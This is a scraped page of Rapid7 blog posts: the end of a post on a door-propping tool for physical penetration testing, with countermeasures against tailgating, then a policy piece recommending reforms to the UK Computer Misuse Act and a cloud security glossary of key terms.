Likewise, having some padding on the leaf that contacts the door is important to prevent it from scratching paint.

When One Door Opens, Keep It Open: A New Tool for Physical Security Testing

Countermeasures

This tool makes it easier to enter a building or secure area by tailgating. By simulating an attacker with a high level of skill and ingenuity, the tool can help reveal weaknesses in organizations’ physical security protocols — and what countermeasures might be more effective.

If you have an electronic access control system, consider configuring it to trigger alerts if a door has been left open for too long. But the best place to start is to make sure your physical security policies and security awareness training educates staff about tailgating, encourages them not to let someone follow them in, and emphasizes making sure that doors close behind them.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Reforming the UK’s Computer Misuse Act

Post Syndicated from Jen Ellis original https://blog.rapid7.com/2021/08/12/reforming-the-uks-computer-misuse-act/

Reforming the UK’s Computer Misuse Act

The UK Home Office recently ran a Call for Information to investigate the Computer Misuse Act 1990 (CMA). The CMA is the UK’s anti-hacking law, and as Rapid7 is active in the UK and highly engaged in public policy efforts to advance security, we provided feedback on the issues we see with the legislation.

We have some concerns with the CMA in its current form, as well as recommendations for how to address them. Additionally, because Rapid7 has addressed similar issues relating to U.S. laws — particularly as relates to the U.S. equivalent of the CMA, the Computer Fraud and Abuse Act (CFAA) — for each section below, we’ve included a short comparison with U.S. law for those who are interested.

Restrictions on security testing tools and proof-of-concept code

One of the most concerning issues with the CMA is that it imperils dual-use open-source security testing tools and the sharing of proof-of-concept code.

Section 3A(2) of the CMA states:

(2) A person is guilty of an offence if he supplies or offers to supply any article believing that it is likely to be used to commit, or to assist in the commission of, an offence under section 1, 3 or 3ZA.

Security professionals rely on open source and other widely available security testing tools that let them emulate the activity of attackers, and exploiting proof-of-concept code helps organizations test whether their assets are vulnerable. These highly valued parts of robust security testing enable organizations to build defenses and understand the impacts of attacks.

Making these products open source helps keep them up-to-date with the latest attacker methodologies and ensures a broad range of organizations (not just well-resourced organizations) have access to tools to defend themselves. However, because they’re open source and widely available, these defensive tools could still be used by malicious actors for nefarious purposes.

The same issue applies to proof-of-concept exploit code. While the intent of the development and sharing of the code is defensive, there’s always a risk that malicious actors could access exploit code. But this makes the wide availability of testing tools all the more important, so organizations can identify and mitigate their exposure.

Rapid7’s recommendation

Interestingly, this is not an unknown issue — the Crown Prosecution Service (CPS) acknowledges it on their website. We’ve drawn from their guidance, as well as their Fraud Act guidelines, in drafting our recommended response, proposing that the Home Office consider modifying section 3A(2) of the CMA to exempt “articles” that are:

  • Capable of being used for legitimate purposes; and
  • Intended by the creator or supplier of the article to be used for a legitimate purpose; and
  • Widely available; unless
  • The article is deliberately developed or supplied for the sole purpose of committing a CMA offense.

If you’re concerned about creating a loophole in the law that can be exploited by malicious actors, rest assured the CMA would still retain 3A(1) as a means to prosecute those who supply articles with intent to commit CMA offenses.

Comparison with the CFAA

This issue doesn’t arise in the CFAA; however, the U.S. is subject to various export control rules that also restrict the sharing of dual-use security testing tools and proof-of-concept code.

Chilling security research

This is a topic Rapid7 has commented on many times in reference to the CFAA and the Digital Millennium Copyright Act, which is the U.S. equivalent of the UK’s Copyright, Designs and Patents Act 1988.

Independent security research aims to reveal vulnerabilities in technical systems so organizations can deploy better defenses and mitigations. This offers a significant benefit to society, but the CMA makes no provision for legitimate, good-faith testing. While Section 1(1) acknowledges that you must have intent to access the computer without authorization, it doesn’t mention that the motive to do so must be malicious, only that the actor intended to gain access without authorization. The CMA states:

(1) A person is guilty of an offence if—

a) he causes a computer to perform any function with intent to secure access to any program or data held in any computer, or to enable any such access to be secured;

b) the access he intends to secure, or to enable to be secured, is unauthorised; and

c) he knows at the time when he causes the computer to perform the function that that is the case.

Many types of independent security research, including port scanning and vulnerability investigations, could meet that description. As frequently noted in the context of the CFAA, it’s often not clear what qualifies as authorization to access assets connected to the internet, and independent security researchers often aren’t given explicit authorization to access a system.

It’s worth noting that neither the National Crime Agency (NCA) or the CPS seem to be recklessly pursuing frivolous investigations or prosecutions of good-faith security research. Nonetheless, the current legal language does expose researchers to legal risk and uncertainty, and it would be good to see some clarity on the topic.

Rapid7’s recommendation

Creating effective legal protections for good-faith, legitimate security research is challenging. We must avoid inadvertently creating a backdoor in the law that provides a defense for malicious actors or permits activities that can create unintended harm. As legislators consider options on this, we strongly recommend considering the following questions:

  • How do you determine whether research is legitimate and justified? Some considerations include whether sensitive information was accessed, and if so, how much – is there a threshold for what might be acceptable? Was any damage or disruption caused by the action? Did the researcher demand financial compensation from the technology manufacturer or operator?

For example, in our work on the CFAA, Rapid7 has proposed the following legal language to indicate what is understood by “good-faith security research.”

The term “good faith security research” means good faith testing or investigation to detect one or more security flaws or vulnerabilities in software, hardware, or firmware of a protected computer for the purpose of promoting the security or safety of the software, hardware, or firmware.

(A) The person carrying out such activity shall

(i) carry out such activity in a manner reasonably designed to minimize and avoid unnecessary damage or loss to property or persons;

(ii)  take reasonable steps, with regard to any information obtained without authorization, to minimize the information the person obtains, retains, and discloses to only that information which the person reasonably believes is directly necessary to test, investigate, or mitigate a security flaw or vulnerability;

(iii) take reasonable steps to disclose any security vulnerability derived from such activity to the owner of the protected computer or the Cybersecurity and Infrastructure Security Agency prior to disclosure to any other party

(iv) wait a reasonable amount of time before publicly disclosing any security flaw or vulnerability derived from such activity, taking into consideration the following:

(I) the severity of the vulnerability,

(II) the difficulty of mitigating the vulnerability,

(III) industry best practices, and

(IV) the willingness and ability of the owner of the protected computer to mitigate the vulnerability;

(v) not publicly disclose information obtained without authorization that is

(I) a trade secret without the permission of the owner of the trade secret; or

(II) the personally identifiable information of another individual, without the permission of that individual; and

(vi) does not use a nonpublic security flaw or vulnerability derived from such activity for any primarily commercial purpose prior to disclosing the flaw or vulnerability to the owner of the protected computer or the [government vulnerability coordination body].

(B) For purposes of subsection (A), it is not a public disclosure to disclose a vulnerability or other information derived from good faith security research to the [government vulnerability coordination body].

  • What happens if a researcher does not find anything to report? Some proposals for reforming the CMA  have suggested requiring coordinated disclosure as a predicate for a research carve out. This only works if the researcher actually finds something worth reporting. What happens if they do not? Is the research then not defensible?
  • Are we balancing the rights and safety of others with the need for security? For example, easing restrictions for threat intel investigators and security researchers may create a misalignment with existing privacy legislation. This may require balancing controls to protect the rights and safety of others.

The line between legitimate research and hack back

In discussions on CMA reform, we often hear the chilling effect on security research being lumped in with arguments for expanding authorities for threat intelligence gathering and operations. The latter sound alarmingly like requests for private-sector hack back (despite assertions otherwise). We believe it is critical that policymakers understand the distinction between acknowledging the importance of good-faith security research on the one hand and authorizing private-sector hack back on the other.

We understand private-sector hack back to mean an organization taking intrusive action against a cyber-attacker on technical assets or systems not owned or leased by the entity taking action or their client. While threat intel campaigners may disclaim hack back, in asking for authorization to take intrusive action on third-party systems — whether to better understand attacks, disrupt them, or even recapture lost data — they’re certainly satisfying the description of hack back and raising a number of concerns.

Rapid7 is strongly opposed to private-sector hack back. While we view both independent, good-faith security research and threat intelligence investigations as critical for security, we believe the two categories of activity need separate and distinct legal restrictions.

Good-faith security research is typically performed independently of manufacturers and operators in order to identify flaws or exposures in systems that provide opportunities for attackers. The goal is to remediate or mitigate these issues so that we reduce opportunities for attackers and decrease the risk for technology users. These activities often need to be undertaken without authorization to avoid blowback from manufacturers or operators that prioritize their reputation or profit above the security of their customers.

This activity is about protecting the safety and privacy of the many, and while researchers may take actions without authorization, they only do so on the technology of those ultimately responsible for both creating and mitigating the exposure. Without becoming aware of the issue, the technology provider and their users would continue to be exposed to risk.

In contrast, threat intel activities that involve interrogating or interacting with third-party assets prioritize the interests of a specific entity over those of other potential victims, whose compromised assets may have been leveraged in the attack. While threat intelligence can be very valuable in helping us understand how attackers behave — which can help others identify or prepare for attacks — data gathering and operations should be limited to assessing threats to assets that are owned or operated by the authorizing entity, or to non-invasive activities such as port scanning. More invasive activities can result in unintended consequences, including escalation of aggression, disruption or destruction for innocent third parties, and a quagmire of legal liability.

Because cyber attacks are criminal activity, if more investigation is needed, it should be undertaken with appropriate law enforcement involvement and oversight. We see no practical way to provide appropriate oversight or standards for the private sector to engage in this kind of activity.

Comparison to the CFAA

This issue also arises in the CFAA. In fact, it’s exacerbated by the CFAA enabling private entities to pursue civil causes of action, which mean technology manufacturers and operators can seek to apply the CFAA in private cases against researchers. This is often done to protect corporate reputations, likely at the expense of technology users who are being exposed to risk. These private civil actions chill security research and account for the vast majority of CFAA cases and lawsuit threats focused on research. One of Rapid7’s recommendations to the UK Home Office was that the CMA should not be updated to include civil liability.

Washington State has helped protect good-faith security research in its Cybercrime Act (Chapter 9A.90 RCW), which both addresses the issue of defining authorization and exempts white-hat security research.

It’s also worth noting that the U.S. has an exemption for security research in Section 1201 of the Digital Millennium Copyright Act (DMCA). It would be good to see the UK government consider something similar for the Copyright, Designs and Patents Act 1988.

Clarifying authorization

At its core, the CMA effectively operates as a law prohibiting digital trespass and hinges on the concept of authorization. Four of the five classes of offenses laid out in the CMA involve “unauthorized” activities:

1. Unauthorised access to computer material.

2. Unauthorised access with intent to commit or facilitate commission of further offences.

3. Unauthorised acts with intent to impair, or with recklessness as to impairing, operation of computer, etc.

3ZA.Unauthorised acts causing, or creating risk of, serious damage

Unfortunately, the CMA does not define authorization (or the lack thereof), nor detail what authorization should look like. As a result, it can be hard to know with certainty where the legal line is truly being drawn in the context of the internet, where many users don’t read or understand lengthy terms of service, and data and services are often publicly accessible for a wide variety of novel uses.

Many people take the view that if something is accessible in public spaces on the internet, authorization to access it is inherently granted. In this view, the responsibility lies with the owner or operator to ensure that if they don’t want to grant access to something, they don’t make it publicly available.

That being the case, the question becomes how systems owners and operators can indicate a lack of authorization for accessing systems or information in a way that scales, while still enabling broad access and innovative use of online services. In the physical world, we have an expectation that both public and private spaces exist. If a space is private and the owners don’t want others to access it, they can indicate this through signage or physical barriers (walls, fences, or gates). Currently, there is no accepted, standard way for owners and operators to set out a “No Trespassing” sign for publicly accessible data or systems on the internet that truly serves the intended purpose.

Rapid7’s recommendation

While a website’s Terms of Service (TOS) can be legally enforceable in some contexts, in our opinion the Home Office should not take the position that violations of TOS alone qualify as “unauthorized acts.” TOS are almost always ignored by the vast majority of internet users, and ordinary internet behavior may routinely violate TOS (such as using a pseudonym where a real name is required).

Reading TOS also does not scale for internet-wide scanning, as in the case of automated port scanning and other services that analyze the status of millions of publicly accessible websites and online assets. In addition, if TOS is “authorization” for the purposes of the CMA, it gives the author of the TOS the power to define what is and isn’t a hacking crime under CMA section 1.

To address this lack of clarity, the CMA needs a clearer explanation of what constitutes authorization for accessing technical systems or information through the internet and other forms of connected communications.

Comparison with the CFAA

This issue absolutely exists with the CFAA and is at the core of many of the criticisms of the law. Multiple U.S. cases have rejected the notion that TOS violations alone qualify as “exceeding authorization” under the CFAA, creating a split in the courts. The U.S. Supreme Court’s recent decision on Van Buren v. United States confirmed TOS is an insufficient standard, noting that if TOS violations alone qualify as unauthorized act for computer crime purposes, “then millions of otherwise law-abiding citizens are criminals.”

Next steps

We hope the Home Office will take these concerns into consideration, both in terms of ensuring the necessary support for security testing tools and security research, and also in being cautious not to go so far with authorities that we open the door to abuses. We’ll continue to engage on these topics wherever possible to help policymakers navigate the nuances and keep advancing security.

You can read Rapid7’s full response to the Home Office’s CFI or our detailed CMA position.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Cloud Security Glossary: Key Terms and Definitions

Post Syndicated from Shelby Matthews original https://blog.rapid7.com/2021/08/11/cloud-security-glossary-key-terms-to-know/

Cloud Security Glossary: Key Terms and Definitions

When navigating the complexities of the public cloud, it’s easy to get lost in the endless acronyms, industry jargon, and vendor-specific terms. From K8s to IaC to Shift Left, it can be helpful to have a map to navigate the nuances of this emerging segment of the market.

That’s why a few cloud security experts here at Rapid7 created a list of terms that cover the basics — the key terms and concepts that help you continue your journey into cloud security and DevSecOps with clarity and confidence. Here are the most important entries in your cloud security glossary.


Application Program Interface (API): A set of functions and procedures allowing for the creation of applications that can access the features or data of an operating system, application, or other service.

  • The InsightCloudSec API can be used to create insights and bots, modify compliance packs, and perform other functions outside of the InsightCloudSec user interface.

Cloud Security Posture Management (CSPM): CSPM solutions continuously manage cloud security risk. They detect, log, report, and provide automation to address common issues. These can range from cloud service configurations to security settings and are typically related to governance, compliance, and security for cloud resources.

Cloud Service Provider (CSP): A third-party company that offers a cloud-based platform, infrastructure, application, or storage services. The most popular CSPs are AWS, Azure, Alibaba, and GCP.

Cloud Workload Protection Program (CWPP): CWPPs help organizations protect their capabilities or workloads (applications, resources, etc.) running in a cloud instance.

Container Security: A container represents a software application and may contain all necessary code, run-time, system tools, and libraries needed to run the application. Container hosts can be packed with risk, so properly securing them means maintaining visibility into vulnerabilities associated with their components and layers.

Entitlements: Entitlements, or permissions entitlements, give domain users control over basic users’ and organization admins’ permissions to access certain parts of a tool.

Identity Access Management (IAM): A framework of policies and technologies for ensuring the right users have the appropriate access to technology resources. It’s also known as Cloud Infrastructure Entitlement Management (CIEM), which provides identity and access governance controls with the goal of reducing excessive cloud infrastructure entitlements and streamlining least-privileged access (LPA) protocols across dynamic, distributed cloud environments.

Infrastructure: With respect to cloud computing, infrastructure refers to an enterprise’s entire cloud-based or local collection of resources and services. This term is used synonymously with “cloud footprint.”

Infrastructure as Code (IaC): The process of managing and provisioning computer data centers through machine-readable definition files, rather than physical hardware configuration or interactive configuration tools. With IaC, configuration files contain your infrastructure specifications, making it easier to edit and distribute configurations.

Kubernetes: A portable, extensible open-source platform for deploying, managing, and orchestrating containerized workloads and services at scale.

Least-Privileged Access (LPA): A security and access control concept that gives users the minimum necessary permissions based on the functions required for their particular roles.

Shared Responsibility Model: A framework in cloud computing that defines who is responsible for the security and compliance of each component of the cloud architecture. With on-premise data centers, the responsibility is solely on your organization to manage and maintain security for the entire technology stack, from the physical hardware to the applications and data. Because public cloud computing purposefully abstracts layers of that tech stack, this model acts as an agreement between the CSP and their customer as to who takes on the responsibility of managing and maintaining proper hygiene and security within the cloud infrastructure.

Shift Left: A concept that refers to building security into an earlier stage of the development cycle. Traditionally, security checks occurred at the end of the cycle. By shifting left, organizations can ensure their applications are more secure from the start — and at a much lower cost.

BECOME FLUENT IN CLOUD SECURITY

Read the full glossary now